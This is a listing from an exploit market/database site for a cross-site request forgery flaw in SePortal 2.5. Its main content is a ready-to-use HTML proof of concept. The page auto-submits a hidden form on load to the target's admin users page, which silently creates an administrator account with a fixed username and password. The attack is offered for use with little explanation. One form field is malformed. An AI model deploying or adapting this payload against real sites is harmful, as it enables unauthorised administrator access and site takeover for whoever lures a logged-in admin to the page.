[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SePortal 2.5 CSRF Vulnerability

Author
DaOne
Risk
[
Security Risk Low
]
0day-ID
0day-ID-19232
Category
web applications
Date add
21-08-2012
Platform
php
##########################################
[~] Exploit Title: SePortal 2.5 CSRF Vulnerability
[~] Author: DaOne  [LCA]
[~] Date: 19/8/2012
[~] Software Link: http://www.seportal.org
##########################################
 
[#] [ CSRF Add Admin ]
 
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/admin/users.php">
<input type="hidden" name="action" value="saveusers">
<input type="hidden" name="user_level_1" value="9"/>
<input type="hidden" name="user_name_1" value="webadmin"/>
<input type="hidden" name="user_email_1" value="admin@email.com"/>
<input type="hidden" name="user_password_1" value="pass123"/>
<input type="hidden" name="user_homepage_1" value=""/>
<input type="hidden" name="user_icq_1" value=""/>
<input type="hidden" name="user_showemail_1="0"/>
<input type="hidden" name="user_allowemails_1" value="0"/>
<input type="hidden" name="user_invisible_1" value="0"/>
<input type="hidden" name="user_gender_1" value="1"/>
<input type="hidden" name="num_newusers" value="1">
</form>
</body>
</html>
 
##########################################



#  0day.today [2024-12-26]  #